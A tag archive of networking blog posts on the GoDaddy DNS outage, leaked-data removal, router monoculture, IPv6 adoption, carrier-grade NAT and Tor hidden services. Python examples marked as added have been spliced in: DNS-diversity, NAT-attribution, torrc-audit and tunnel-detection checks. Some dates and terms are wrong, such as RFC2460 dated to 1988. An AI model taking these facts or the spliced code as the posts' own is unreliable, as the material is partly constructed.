Tag Archives: Internet

GoDaddy Outage: RFC for Dummies

Yesterday was a black day for GoDaddy.com. For a few hours, all their hosting services were interrupted: mail, websites but, worse, all the DNS services were unavailable. The outage was claimed on Twitter by a member of Anonymous, but this is not yet confirmed. Personally, I don’t care who’s behind the attack! The result is the same: millions of websites remained unreachable for hours. Other people started to blame GoDaddy and to exhort customers to move to another provider. Do you really think other companies would resist a massive DDoS attack? I don’t!

Let’s leave this aside and focus on the consequences. Lots of websites were simply not reachable because their hostnames could not be resolved. Wait! When I connected to the Internet for the first time (and – trust me – I’ve been here for a while!), everybody told me that this super-network was derived from a military project. The goal was to build a super-strong meshed network able to resist almost any attack from the “enemies”. Today, we are in 2012 and millions of sites are affected by a “simple” attack! Is there a problem somewhere?

Are people entitled to complain about GoDaddy not providing the services they subscribed to? Is moving quickly to an alternate provider the best choice? I don’t think so. My view is that the Internet has become a real medium like any other, and people tend to forget the complexity that exists behind nice websites with beautiful interfaces and plenty of features. The Internet (read: “the set of all protocols used to build the Internet”) relies on RFCs (“Request For Comments”). Those documents are memoranda published by the IETF (“Internet Engineering Task Force”) and describe how to build a working Internet. As a developer, manufacturer or designer, you must see those RFCs as golden rules!

Back to the GoDaddy story! There is a very interesting document, RFC2182, with the title “Selection and Operation of Secondary DNS Servers”. If you read it (please do!), you will find best practices for defining secondary DNS servers for your domain(s). How many do you need? How should they be deployed? Let’s take a simple example: digitalz.org. This domain is hosted by GoDaddy:

$ dig digitalz.org ns

; <<>> DiG 9.8.1-P1 <<>> digitalz.org ns
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 20319
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;digitalz.org. IN NS

;; ANSWER SECTION:
digitalz.org. 3600 IN NS ns13.domaincontrol.com.
digitalz.org. 3600 IN NS ns14.domaincontrol.com.

;; Query time: 68 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Tue Sep 11 08:30:25 2012
;; MSG SIZE rcvd: 85

But if you look at the two registered nameservers (ns13 & ns14):

$ host ns13.domaincontrol.com.
ns13.domaincontrol.com has address 216.69.185.7
ns13.domaincontrol.com has IPv6 address 2607:f208:206::7
$ host ns14.domaincontrol.com.
ns14.domaincontrol.com has address 208.109.255.7
ns14.domaincontrol.com has IPv6 address 2607:f208:302::7

Both are part of the same backbone belonging to GoDaddy:

NetRange: 216.69.128.0 - 216.69.191.255
CIDR: 216.69.128.0/18
OriginAS:
NetName: GO-DADDY-COM-LLC
NetHandle: NET-216-69-128-0-1
Parent: NET-216-0-0-0-0
NetType: Direct Allocation
RegDate: 2004-05-24
Updated: 2012-02-24
Ref: http://whois.arin.net/rest/net/NET-216-69-128-0-1

NetRange: 208.109.0.0 - 208.109.255.255
CIDR: 208.109.0.0/16
OriginAS:
NetName: GO-DADDY-COM-LLC
NetHandle: NET-208-109-0-0-1
Parent: NET-208-0-0-0-0
NetType: Direct Allocation
RegDate: 2006-04-12
Updated: 2012-02-24
Ref: http://whois.arin.net/rest/net/NET-208-109-0-0-1

Finally, have a look at the BGP routes used to reach those IP ranges: they are announced through the same autonomous system (AS26496):

BGP routing table entry for 208.109.255.0/24, version 111874851
Paths: (5 available, best #2, table Default-IP-Routing-Table)
Multipath: eBGP iBGP
  Advertised to update-groups:
     3         
  26496
    195.69.144.26 (metric 20) from 195.26.4.255 (195.26.4.255)
      Origin IGP, metric 1000, localpref 100, valid, internal
      Community: 5577:2000 5577:2100 5577:2103 5577:5000 5577:5002
      Originator: 195.26.4.133, Cluster list: 0.0.0.2
  26496
    195.69.144.26 (metric 20) from 195.26.4.254 (195.26.4.254)
      Origin IGP, metric 1000, localpref 100, valid, internal, best
      Community: 5577:2000 5577:2100 5577:2103 5577:5000 5577:5002
      Originator: 195.26.4.133, Cluster list: 0.0.0.1
  46786 26496
    199.59.206.17 from 199.59.206.17 (204.26.60.249)
      Origin IGP, localpref 100, valid, external
      Community: 5577:2000 5577:2100 5577:2150 5577:2199 5577:5000 5577:5001
  46786 26496
    199.59.206.29 from 199.59.206.29 (204.26.60.249)
      Origin IGP, localpref 100, valid, external
      Community: 5577:2000 5577:2100 5577:2150 5577:2199 5577:5000 5577:5001
  3549 26496
    208.178.63.97 from 208.178.63.97 (67.17.80.136)
      Origin IGP, metric 100, localpref 49, valid, external
      Community: 3549:4698 3549:31528 5577:1000 5577:1001 5577:5000 5577:5001

As you can imagine, any issue with this BGP autonomous system would have a huge impact on the services (being multi-homed would not solve all the problems). There are plenty of nightmare stories about BGP issues. In this case, the best practice is to use multiple DNS servers spread geographically (e.g. one on each continent) and connected to multiple, totally independent backbones. In other words: don’t put all your eggs in the same basket! Always keep in mind that RFCs are your best friends. Follow and implement them to increase the availability of your online services.
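As an added example (this is not code from the original post), here is a small Python check that applies the RFC 2182 reasoning above to a set of name servers. The first data set is constructed from the dig, host, whois and BGP output shown above (addresses, ARIN blocks and origin AS26496); the second is a hypothetical layout using documentation prefixes and private AS numbers. The AS and block mapping is supplied by the caller, nothing is queried over the network, so the check runs offline.

```python
import ipaddress

# Constructed sample built from the dig / host / whois / BGP output above:
# the two authoritative servers of digitalz.org, their IPv4 addresses, the
# ARIN block each one sits in, and the origin AS seen in the BGP table.
GODADDY_NS = {
    "ns13.domaincontrol.com.": {"ip": "216.69.185.7",  "block": "216.69.128.0/18", "asn": 26496},
    "ns14.domaincontrol.com.": {"ip": "208.109.255.7", "block": "208.109.0.0/16",  "asn": 26496},
}

# Hypothetical layout with secondaries spread over three unrelated networks
# (documentation prefixes and private AS numbers, used only as placeholders).
DIVERSE_NS = {
    "ns1.example.net.": {"ip": "192.0.2.10",    "block": "192.0.2.0/24",    "asn": 64496},
    "ns2.example.org.": {"ip": "198.51.100.20", "block": "198.51.100.0/24", "asn": 64497},
    "ns3.example.com.": {"ip": "203.0.113.30",  "block": "203.0.113.0/24",  "asn": 64498},
}


def parent_domain(ns_name):
    """'ns13.domaincontrol.com.' -> 'domaincontrol.com' (the operator's zone)."""
    return ns_name.rstrip(".").split(".", 1)[1]


def diversity_findings(nameservers, min_servers=2):
    """Return a list of RFC 2182-style findings for a set of NS records.

    nameservers maps each NS hostname to its address, the allocated block it
    belongs to and the AS originating that block. The routing data must be
    supplied by the caller (from whois or a looking glass); nothing is looked
    up here, so the check runs offline and is easy to unit-test.
    """
    findings = []

    if len(nameservers) < min_servers:
        findings.append(f"only {len(nameservers)} server(s); at least {min_servers} recommended")

    # Sanity check: each address must really sit inside the block claimed for it.
    for name, info in nameservers.items():
        if ipaddress.ip_address(info["ip"]) not in ipaddress.ip_network(info["block"]):
            findings.append(f"{name}: {info['ip']} is not inside {info['block']}")

    # Organisational diversity: all servers under one operator's zone means a
    # single organisation (and its outage) stands between you and resolution.
    parents = sorted({parent_domain(name) for name in nameservers})
    if len(parents) == 1:
        findings.append(f"all servers share the parent domain {parents[0]} (single operator)")

    # Topological diversity: a single origin AS means a single routing failure
    # domain, whatever the number of servers.
    asns = sorted({info["asn"] for info in nameservers.values()})
    if len(asns) == 1:
        findings.append(f"all servers are originated by a single AS (AS{asns[0]})")

    # Same allocation, or even the same /24, means the same network and most
    # likely the same data centre.
    blocks = {info["block"] for info in nameservers.values()}
    if len(blocks) == 1:
        findings.append(f"all servers live in the same allocation {next(iter(blocks))}")

    subnets = {ipaddress.ip_network(info["ip"] + "/24", strict=False) for info in nameservers.values()}
    if len(subnets) < len(nameservers):
        findings.append("at least two servers share the same /24")

    return findings


if __name__ == "__main__":
    for label, ns in (("digitalz.org (GoDaddy)", GODADDY_NS), ("hypothetical diverse set", DIVERSE_NS)):
        print(f"{label}:")
        for finding in diversity_findings(ns) or ["no finding"]:
            print(f"  - {finding}")
```

Run against the digitalz.org data the check reports two findings (one operator, one origin AS); the hypothetical set reports none. Feeding it the output of your own registrar's NS records plus whois data is a quick way to see whether a secondary is really a secondary.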

Outages like GoDaddy’s are always good opportunities to recall best practices. We learn by making mistakes!

You Just Have Been Erased! Are You Sure?

This is a never-ending story! People never realize that once data has been published online, it is a nightmare to try to remove it. Here is another example…

In parallel to this blog, I’m playing with another website called leakedin.com. Its purpose is to educate people about the huge amount of data that can be posted on the Internet without their prior consent, by mistake or, worse, deliberately! The website compiles interesting data collected from paste websites using my tool pastemon. Everything is automated, and some content can be grabbed just before it is removed by the website maintainers (pastebin.com looks more and more aggressive on this point). I completely agree that some content might be offensive to some people. That’s why my website offers an abuse page to report such content. When something is reported, the content is immediately removed. My goal is not to offend people! A few days ago I received this message:

From: xxxxx@xxxxx.xxx
Subject: please remove ASAP!

My Social Security # is on your website in 2 different locations. It originated on pastebin and has since been deleted from their website. Please remove both links from Leakedin.com.

http://www.leakedin.com/2012/05/04/xxxxxx

http://www.leakedin.com/2012/05/04/yyyyyy

Thanks,
xxxxxx xxxxx

A few hours later, the content was removed and I notified the person with a standard reply. Then, a second message came in:

From: xxxxx@xxxxx.xxx
Subject: Re: please remove ASAP!

Thanks for deleting 2 links with my SS# (see below) but I still see it when googling my name "xxxxx". Please help!!
Thank you,

LeakedIn » Blog Archive » Potential leak of data: US SSN
www.leakedin.com/2012/05/04/xxxxx/
May 4, 2012 - J 08213 xxxxx xxx xxxxx xxx xxxxx MS xxx xx/xx/xxxx xxx-xx-xxxx xx/xx/xxxx xxx-xx-xxxx xxxxx xxxxx xxx

LeakedIn » Blog Archive » Potential leak of data: US SSN
www.leakedin.com/2012/05/04/xxxxx/
May 4, 2012 - ... xxxx xxxx xxxx xx xxxxx xx/xx/xxxx xxx-xx-xxxx xxxxx xxxxx xxxxx xxxx xxxx xx xxxxx xx/xx/xxxx xxx-xx-xxxx ...

Ok, ok, how to answer in a comprehensive and polite way? We are not in a Hollywood movie: there is no way to roll back time and forget what happened using a neuralizer! There is no “format” or “delete” button on the Internet. I won’t say it’s impossible to get rid of all your private data. There are even companies which sell their services to build you a brand new, clean online profile (for lots of $$$).

This example was based on private data related to one person. I let you imagine what happens when a company loses thousands of records or publishes confidential data by accident. Such incidents occur every day. The correct title for this article should be “You just have been… indexed!”.

Biology Rules Apply to Infosec?

(Source: www.esa.org)

In biology, it is proven that consanguinity between members of the same group (for example, people living in the same closed area or animals of the same breed) may affect their resistance to certain diseases or reduce certain physical characteristics. It’s important to keep some level of diversity. The latest Juniper story reminded me of the talk about “monoculture” presented at BlackHat Europe 2011.

A few days ago, some parts of the Internet were affected by a bug in the BGP update code of Juniper routers. If you look at the core-router market, it is dominated by two manufacturers: Cisco & Juniper. Routers operated by major ISPs are crucial to keeping the Internet reliable. If most of those devices come from a single manufacturer (or a very limited number of them), you increase the risk of facing big issues when they are affected by a bug or a security flaw.

Now, speaking about devices or applications in general (the core routers were just an example) and from a business point of view, monoculture is positive:

  • You can negotiate better prices (the more items you buy, the more discount you receive),
  • You can easily negotiate with other resellers,
  • You easily find engineers with enough knowledge, or external consultants,
  • Your engineers don’t need multiple skills and certifications,
  • Plenty of online resources may help you,
  • You get some nice goodies from the manufacturers.

But, putting layer 8 (the “political layer”) aside, monoculture has side effects:

  • Big players offer a very large attack surface (attackers will select the most widely deployed targets),
  • Manufacturers don’t have time to re-invent the wheel, and different products may re-use the same (vulnerable) piece of code,
  • Big players might be slower to react to vulnerabilities,
  • Big players might be less motivated to change,
  • Your vision of the market is restricted.

Like in biology, monoculture can generate catastrophic situations in case of a successful attack or major bug. I don’t say that big players do a bad job (otherwise they could never reach such a market share). Just don’t behave like a lemming. Choose the solution which matches your requirements, not just because “it’s a big name”.

Do you remember the French movie “Les Rivières Pourpres” (“The Crimson Rivers”) with the closed society of Guernon?


We Survived the World IPv6 Day!

I survived

(Source: makemymood.com)

… and the first World IPv6 Day! This first major event to promote version six of the IP protocol looks to be a success for most companies. For most users, it was completely transparent, as network administrators prepared all the required stuff in the background. Maybe you were a lucky IPv6 user!

I quickly set up a SmokePing server to monitor the availability of IPv6 sites. I configured and tested ~100 IPv6 websites over 2 days.

Almost all companies which participated in the worldwide test were reachable, except some which blocked all incoming ICMP traffic. Some strictly respected the defined time window (like Google – see below), others extended the tests.

Google IPv6 Response Time


From my own experience, during the 24-hour period, 3.04% of the HTTP requests to this blog were transported over IPv6! This is not bad compared to the regular traffic (less than 1%). On the other hand, the content is mainly oriented to technical people who were ready to play with IPv6. I’m not sure that a blog about gardening or biking would generate the same amount of traffic. As you can see, there was an increase in incoming traffic:

IPv6 Bandwidth


What’s next? I would like to get rid of my tunnel as soon as possible. It is definitely unstable and increases the latency. To achieve this, I’m waiting for good news from my hosting company. They have been promising native IPv6 for months now! Otherwise, let’s keep up the pressure and not fall asleep. We need to move to IPv6 as soon as possible! Remember: “There is no place like ::1”.

Ready for the World IPv6 Day?

Next Wednesday will be the 1st World IPv6 Day! Are you ready? What are your plans? Unfortunately, I’ll be visiting a customer, but I’ll try to grab some popcorn and coke and keep an eye on the Internet. The goal is simple: make a maximum of websites and online services available through IPv6 for 24 hours.

All operating systems today are dual-stacked: they work with IPv4 and IPv6. On local networks, IPv6 addresses are assigned automatically; maybe your laptop or desktop already has such an address. Did you check? Recent operating systems give higher priority to IPv6: if a website URL resolves to an “AAAA” record, it will be used. Alas, today, most websites do not (yet) enable quad-A records for their main URL; they prefer alternatives. A well-known example is Google, available via ipv6.google.com. During the IPv6 day, the main URL (“www.google.com”) will be available via IPv4 and IPv6 at the same time. Just like my blog:

  $ host blog.rootshell.be
  blog.rootshell.be has address 88.191.119.130
  blog.rootshell.be has IPv6 address 2001:5c0:1400:b::9349

Due to the higher priority of IPv6, your browser will use this address. Then problems may occur… And that’s the purpose of this event: detect issues and fix them!

Unfortunately, the Internet is often managed by the (in)famous “layer 8”. IMHO, the biggest commercial websites won’t play the game. The risk of losing revenue will take over the technical aspects. According to the different mailing lists and forums that I’m following, this event could be renamed the “World Geek IPv6 Day”. Indeed, most people who will participate are technical guys (network & system administrators). Where are the managers amongst us? From a technical point of view, lots of people are deploying reverse proxies connected over IPv6 and forwarding requests internally to the “old” IPv4 servers.

I set up a SmokePing server which monitors a bunch of IPv6 websites participating in the event:

SmokePing

It runs on IPv6 only and will also help me to stress test my home IPv6 tunnel (I don’t expect native IPv6 to be delivered by my ISP before 20xx!). I hope to gather interesting statistics during the day. Due to lack of bandwidth, I can’t make it available publicly, but I’ll share interesting statistics after the event.

Other nice initiatives:

  • The RIPE developed a “World IPv6 Day Connectivity Chart” (available here).
  • Eric Vyncke’s IPv6 deployment status.

And finally, a special mention on the wall of shame for Microsoft, which released a fix to change the priority of the IP stacks before and after the event:

The following Fix it solution will resolve the issue by configuring your computer to prefer IPv4, instead of IPv6. By default, Windows prefers IPv6 over IPv4. This Fix it solution is temporary, to resolve issues on World IPv6 Day for affected Internet users. On June 10, 2011 at 12:00AM, your computer will be configured to prefer IPv6 again after your next reboot.

From my point of view, if your workstation is so critical to your business, do you really need Internet access? The World IPv6 Day will be a great opportunity to test IPv6 live. Don’t miss it!

Finally, during the day, Twitter will be a good source of information. Follow the hashtag “#WorldIPv6Day“.

Carrier Grade NAT VS IPv6

Yesterday I went to a cocktail organized by ISPA, the Belgian Internet Service Providers Association. I worked several years for ISPs and I try to keep in touch with them to gather interesting information about market trends. The topic of the event was “IPv6” (what a surprise!).

Eric Vyncke, CTO of the IPv6 Forum, presented a keynote and, one more time, invited ISPs to deploy IPv6 as soon as possible. Compared to other European countries, Belgium is far behind! It was also a good opportunity to do some networking. While listening to some conversations, I learned that some ISPs have plans to deploy “Carrier Grade NAT” (CGN) as a transition to IPv6. What???

The main problem for ISPs is not their backbone and networking devices (all manufacturers have been IPv6 ready for years) but the triple-play boxes massively deployed on their customers’ premises! The idea behind CGN is to assign private IP addresses to customers and perform NAT at the ISP level. With this technique, multiple customers may be hidden behind a single public IP address:

Carrier Grade NAT Example

From a technical point of view, there is no difference between Carrier Grade NAT and regular NAT. The goal is to assign private IP addresses (following RFC1918) to “internal” hosts and “translate” them into public IP addresses which are routable on the Internet. In the case of CGN, this translation is performed by the ISP at the edge of its backbone, just before reaching the wild Internet. As IP addresses for residential customers are already assigned dynamically, it’s tempting to use this technique instead of immediately jumping on the IPv6 train. It looks interesting… but it’s not!

First, my point of view as a customer. I’m paying my subscription to have FULL Internet connectivity. I’m paying for an open pipe to the Internet; I don’t want to be limited in any way. Today, most ISPs already filter critical ports like SMTP (25) and HTTP (80) “for my own security”… But I’m using VPNs and other services to connect back to my home network. If ISPs implement Carrier Grade NAT, forget this! No more incoming connections will be allowed from the Internet to your home. Online services which rate-limit the usage of their resources also rely on IP addresses. Try to use Google Hacking without splitting your requests across multiple proxies and you will be quickly banned: Google will authorize new requests only after you solve a CAPTCHA. Twitter is also well known for limiting the number of requests to its API. If multiple customers are connected to the Internet behind the same IP address, there is a higher risk of being blocked by services with poor user detection.

From a commercial point of view, how will ISPs deal with customers still in need of a valid public IP address? Will they split their offers and propose both solutions? There is a risk that subscriptions with a “good” IP address will be more expensive. I call this discrimination! Sorry to be rough!

From a business point of view, some services like online advertising will suffer from this solution. How will Google be able to correctly analyze people’s behavior and display relevant ads if multiple people use the same IP address? From the same IP, people will visit fishing, technology or football websites. It will become a headache to display the right ads! Conclusion: risk of loss of revenue.

Finally, and maybe the worst case, the legal point of view. Imagine suspicious activity detected against a website. After investigation, the offending public IP address has been extracted from the logs. Who’s behind this IP address? How many customers? According to data retention laws, ISPs must keep records of IP communications. Alas, most ISPs do not log the source port of all communications. Without this information, it will be impossible to track the user at the source.
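To make the two points above concrete (how CGN shares one public address, and why a binding log without source ports cannot attribute a connection), here is an added Python model written for this post; it is not an ISP's code. The public address, private addresses and timestamps are constructed, and the log layout is a hypothetical simplification of what a real CGN would export.

```python
from itertools import count


class CarrierGradeNat:
    """Minimal CGN model (added example, hypothetical).

    One public address is shared by every customer. Each outgoing connection
    is given a fresh public source port, and the binding is recorded the way
    a data-retention log would have to record it to be useful later.
    """

    def __init__(self, public_ip, first_port=40000):
        self.public_ip = public_ip
        self._ports = count(first_port)
        # One record per binding: (timestamp, customer_ip, customer_port, public_port)
        self.log = []

    def translate(self, timestamp, customer_ip, customer_port):
        """Map a customer's private source socket to the shared public one."""
        public_port = next(self._ports)
        self.log.append((timestamp, customer_ip, customer_port, public_port))
        return self.public_ip, public_port


def build_sample():
    """Constructed traffic: three RFC1918 customers opening four connections."""
    nat = CarrierGradeNat("198.51.100.5")  # constructed (documentation) public address
    nat.translate("2011-05-12T10:00:01Z", "10.64.3.17", 51234)
    nat.translate("2011-05-12T10:00:02Z", "10.64.7.201", 49152)
    nat.translate("2011-05-12T10:00:05Z", "10.64.3.17", 51235)
    nat.translate("2011-05-12T10:00:09Z", "10.64.9.88", 60211)
    return nat


def customers_behind(nat, public_port=None):
    """Answer the investigator's question: who was behind this address?

    With only the public IP (what a typical web server log holds) the answer
    is every customer that shared it. With the public source port as well,
    the binding log narrows it down to a single customer. A real lookup must
    also match on time, because public ports are reused once a binding expires.
    """
    return {
        customer_ip
        for _, customer_ip, _, port in nat.log
        if public_port is None or port == public_port
    }


if __name__ == "__main__":
    nat = build_sample()
    print("IP only    :", sorted(customers_behind(nat)))
    print("IP + port  :", sorted(customers_behind(nat, 40001)))
```

The second lookup only works because the CGN kept the public port in its log and the web server kept the client port in its access log; drop either side and the investigator is back to a list of every customer on that address.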

Dear ISP’s, come on, it’s time to wake up and deploy IPv6 NOW!


Escaping Censorship with Tor Hidden Services

Tor, aka “The Onion Router”, is a well-known network running on top of the regular Internet. It protects the confidentiality of communications between users and regular online services. Like the multiple layers of an onion, Tor is a worldwide decentralized network based on layers. When you need to connect to a remote site, your packets enter the Tor network and are routed to the final destination across several nodes which just relay the traffic anonymously. As explained on the website:

Tor is free software and an open network that helps you defend against a form of network surveillance that threatens personal freedom and privacy, confidential business activities and relationships, and state security known as traffic analysis.

From an authority’s point of view (your boss, your country or whoever), there are several ways to implement blacklists. Examples:

  • Using DNS redirection
  • Using IP addresses blacklists
  • Using Deep Packet Inspection

The first technique consists in redirecting hostnames to a new IP address via DNS. This method was already used once in Belgium in 2009 to prevent Belgian citizens from accessing a controversial website. This is completely ineffective, as websites remain available via their IP address(es), and people using open DNS resolvers like Google or OpenDNS will still be able to access the blacklisted resources. Or, if you are part of an international organization, chances are that you use global resources located in a foreign country.

The next technique, blacklists based on IP addresses, is also useless. This was proven during the “Wikileaks story”: the website was replicated in multiple locations. Those techniques are more of a “cat & mouse” game between the owners of the prohibited resources and the authorities.

Finally, DPI or “Deep Packet Inspection” performs filtering at another level. Instead of using the packet headers (where information like source and destination IP addresses and ports is located), DPI analyzes the payload of packets to detect prohibited content or applications (read: at layer 7 of the OSI model). You could, for example, block packets containing words like “pedo”, “twitter”, “revolution” or “Tibet” (Dear Chinese authorities, if you read this, a big hello from Belgium! ;-) ). Deep Packet Inspection is becoming common in organizations to protect them against data loss or data leakage, or to prevent users from wasting their time/Internet connectivity. But it remains extremely difficult to implement and maintain at the ISP level for performance reasons!

Even if you use Tor, access to some resources might be prohibited if the exit node is connected to an ISP which has implemented such controls. That’s why the Tor developers implemented “Hidden Services”! Once you have joined the Tor network (as a client or a relay), you can offer such services (a website, an SSH gateway or an SMTP relay) which remain inside Tor. Once your packets have entered the network, they won’t go out. Basically, you configure some kind of reverse proxy. In your torrc file, add some configuration lines like the example below:

  ### This section is just for location-hidden services ###
  HiddenServiceDir /home/tor/hidden_service/
  HiddenServicePort 80 127.0.0.1:8080

Restart Tor and two files will be created in the directory defined above: a private key (keep it safe!) and a “hostname” file which contains your assigned URL, something like r1sgytddkyjudx7.onion. This is your “public” hostname (but restricted to the Tor network) that you can communicate to your contacts. More information is available here.
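Two things are easy to get wrong with the configuration above: the backend target should be bound to loopback (a service listening on a routable address is reachable outside Tor as well, which defeats hiding it), and the directory holding the generated private key must not be readable by other users. As an added example (not part of the original post or of Tor itself), the Python below parses the HiddenServiceDir/HiddenServicePort lines of a torrc and reports both problems. The torrc fragment is constructed from the two lines in the post plus a hypothetical second service; the directory checks only run when the directory exists.

```python
import ipaddress
import os
import stat

# Constructed torrc fragment: the two lines from the post plus a second,
# hypothetical service whose backend sits on a routable (documentation) address.
SAMPLE_TORRC = """\
### This section is just for location-hidden services ###
HiddenServiceDir /home/tor/hidden_service/
HiddenServicePort 80 127.0.0.1:8080

HiddenServiceDir /home/tor/other_service/
HiddenServicePort 22 192.0.2.15:22
"""


def parse_hidden_services(text):
    """Group HiddenServicePort lines under the HiddenServiceDir that precedes
    them, which is how Tor itself reads the file. Only the 'addr:port' and
    bare 'port' target forms are handled here (unix sockets are not)."""
    services = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        key, _, value = line.partition(" ")
        value = value.strip()
        if key == "HiddenServiceDir":
            services.append({"dir": value, "ports": []})
        elif key == "HiddenServicePort":
            if not services:
                raise ValueError("HiddenServicePort before any HiddenServiceDir")
            virtport, _, target = value.partition(" ")
            target = target or virtport          # no target given: same port on loopback
            host, sep, port = target.rpartition(":")
            if not sep:                          # a bare port number
                host, port = "127.0.0.1", target
            services[-1]["ports"].append((int(virtport), host.strip("[]"), int(port)))
    return services


def is_loopback(host):
    """True for 127.0.0.0/8, ::1 (with or without brackets) and 'localhost'."""
    if host == "localhost":
        return True
    try:
        return ipaddress.ip_address(host.strip("[]")).is_loopback
    except ValueError:
        return False


def check_service_dir(path):
    """Findings about the on-disk service directory, which holds the private
    key Tor generates: neither it nor the key should be group/world accessible.
    Skipped when the directory does not exist on this machine."""
    findings = []
    if not os.path.isdir(path):
        return findings
    if stat.S_IMODE(os.stat(path).st_mode) & 0o077:
        findings.append(f"{path}: directory is accessible to group/others")
    key = os.path.join(path, "private_key")
    if os.path.exists(key) and stat.S_IMODE(os.stat(key).st_mode) & 0o077:
        findings.append(f"{key}: private key is accessible to group/others")
    return findings


def audit_torrc(text):
    """Return a list of findings for the hidden-service part of a torrc."""
    findings = []
    for svc in parse_hidden_services(text):
        for virtport, host, port in svc["ports"]:
            if not is_loopback(host):
                findings.append(f"{svc['dir']}: port {virtport} -> {host}:{port} is not a loopback address")
        findings.extend(check_service_dir(svc["dir"]))
    return findings


if __name__ == "__main__":
    for finding in audit_torrc(SAMPLE_TORRC) or ["no finding"]:
        print(finding)
```

On the sample the first service passes and the second is flagged, because 192.0.2.15:22 would answer SSH on the clearnet as well as through the .onion name.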

This is a very convenient way to publish online services or data without being blocked by regular controls. Of course, Tor Hidden Services can also be used for malicious activities or to share prohibited content. But that is another debate!

If you are looking for hidden services on the Tor network, there is even a search engine called “Duck Duck Go”, available at the following address: http://3g2upl4pq6kufc4m.onion/:

Duck Duck Go Screenshot


No, the Internet will not Collapse…

In May 2008, I wrote a blog post about IPv6 (Will Finally IPv6 Arise?) with a date: 2011. We have reached the foreseen deadline and it’s now official: IANA is running out of IP addresses. IANA (“Internet Assigned Numbers Authority”) is the organization responsible for assigning IP addresses to the different LIRs (“Local Internet Registries”). As an example, for the countries in Europe, the Middle East and Asia, the RIPE (“Réseaux IP Européens”) is responsible for assigning IP addresses to Internet Service Providers. IP addresses are assigned by IANA as /8 subnets, or 255.0.0.0 (blocks of 16,777,216 IPs). The LIRs split them into smaller subnets and assign them to ISPs or companies (such IP addresses are called “PI” or “Provider Independent”). Finally, ISPs assign them to the final customers; these are called “PA” or “Provider Assigned”.

Does it mean that the Internet will collapse soon? Certainly not. The fact that the whole IP address space has been assigned to LIRs does not mean that all addresses are in use now. For a while now, IP addresses have been assigned to ISPs and organizations using strict procedures and criteria. The time when you could assign a static IP address to all your internal hosts is over. Wake up! Some estimates are based on mathematical models and predict that all IP addresses will be assigned soon (somewhere in 2012). Even if all IP addresses are assigned, I don’t think that it will have a huge impact on the Internet. Big ISPs have already built up some sort of “stock”. A well-known Belgian ISP will only deploy IPv6 in 2012 and 2013. “IPv6” is the solution to the problem. This new protocol has existed since 1988 when RFC2460 was published (not so new!) and has been designated for years to replace the old version 4. I will not go over the differences between these protocols; there are plenty of sites which will do this better than me. Google is your best friend!

So why does it take so long to implement it? This could be summed up in one word: “procrastination”

“In psychology, procrastination refers to the act of replacing high-priority actions or tasks with low-priority actions, and thus putting off important tasks to a later time.” (Source: wikipedia.org)

For the end user, IPv6 will not extend the capabilities of the Internet. Your applications will remain the same. The best example is that the transition will be fully transparent to you! Maybe you are even using IPv6 to visit this blog. But for the Internet Service Providers, the manufacturers and the developers, things are different. All devices and applications must be “IPv6” ready, and this could have several impacts.

From a financial point of view, companies will have to put some money on the table:

  • to upgrade their network infrastructure (routers, switches, firewalls, etc).
  • to upgrade their applications.
  • to train the network team.

But without any real “business” added value, and due to the crisis, all projects that can be postponed are frozen. From a technical point of view, organizations cannot afford to fail their migration to IPv6. It is better to plan the whole migration carefully and perform intensive tests in a lab. Finally, from a security point of view (and not the least one), IPv6 will for sure bring new threats. A nice example is the lack of filtering of IPv6 traffic by firewalls. Today, lots of tunnels are established to provide IPv6 connectivity through IPv4 via services like SixXS or Go6. Traffic exchanged in those tunnels is not often inspected. But there are also potential security issues directly related to the IPv6 protocol, like the PMTU discovery process.
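The uninspected tunnels mentioned above are visible from the IPv4 side if you know what to look for: 6in4/6to4 traffic is IP protocol 41, Teredo rides on UDP/3544 and AYIYA (the encapsulation offered by tunnel brokers such as SixXS) on UDP/5072. As an added example, not code from the original post, the Python below runs that detection over a handful of constructed flow records in a hypothetical NetFlow-like text layout, so a defender can see which internal hosts are bringing IPv6 in past an IPv4-only firewall and how much they move.

```python
from collections import defaultdict, namedtuple

# Constructed flow records in a hypothetical NetFlow-like text export:
# src_ip dst_ip proto src_port dst_port bytes. A firewall that inspects only
# IPv4 sees every one of these as an ordinary IPv4 flow.
SAMPLE_FLOWS = """\
192.0.2.10  203.0.113.5    41 0     0    184320
192.0.2.11  198.51.100.7   17 54321 3544   9120
192.0.2.12  198.51.100.9    6 44123 443   52000
192.0.2.10  203.0.113.5    17 3544  3544     40
192.0.2.13  198.51.100.200 17 40001 53      120
192.0.2.14  198.51.100.77  17 5072  5072  30210
"""

Flow = namedtuple("Flow", "src dst proto sport dport nbytes")

# Encapsulations that carry IPv6 over an IPv4-only network.
IP_PROTO_41 = 41   # 6in4 / 6to4: IPv6 packets directly inside IPv4
UDP = 17
TUNNEL_UDP_PORTS = {3544: "Teredo (UDP/3544)", 5072: "AYIYA (UDP/5072)"}


def parse_flows(text):
    """Turn the text export into Flow tuples; malformed lines are skipped."""
    flows = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 6:
            continue
        src, dst, proto, sport, dport, nbytes = fields
        flows.append(Flow(src, dst, int(proto), int(sport), int(dport), int(nbytes)))
    return flows


def classify_tunnel(flow):
    """Return a label when the flow looks like an IPv6-over-IPv4 tunnel, else None."""
    if flow.proto == IP_PROTO_41:
        return "6in4/6to4 (IP protocol 41)"
    if flow.proto == UDP:
        for port in (flow.sport, flow.dport):
            if port in TUNNEL_UDP_PORTS:
                return TUNNEL_UDP_PORTS[port]
    return None


def find_tunnels(text):
    """(src, dst, label, bytes) for every flow that matches a tunnel signature."""
    hits = []
    for flow in parse_flows(text):
        label = classify_tunnel(flow)
        if label:
            hits.append((flow.src, flow.dst, label, flow.nbytes))
    return hits


def tunnel_bytes_by_host(text):
    """Bytes of tunnelled traffic per internal source host: a quick way to
    rank which machines deserve a look (or a firewall rule) first."""
    totals = defaultdict(int)
    for src, _, _, nbytes in find_tunnels(text):
        totals[src] += nbytes
    return dict(totals)


if __name__ == "__main__":
    for src, dst, label, nbytes in find_tunnels(SAMPLE_FLOWS):
        print(f"{src} -> {dst}: {label}, {nbytes} bytes")
    print(tunnel_bytes_by_host(SAMPLE_FLOWS))
```

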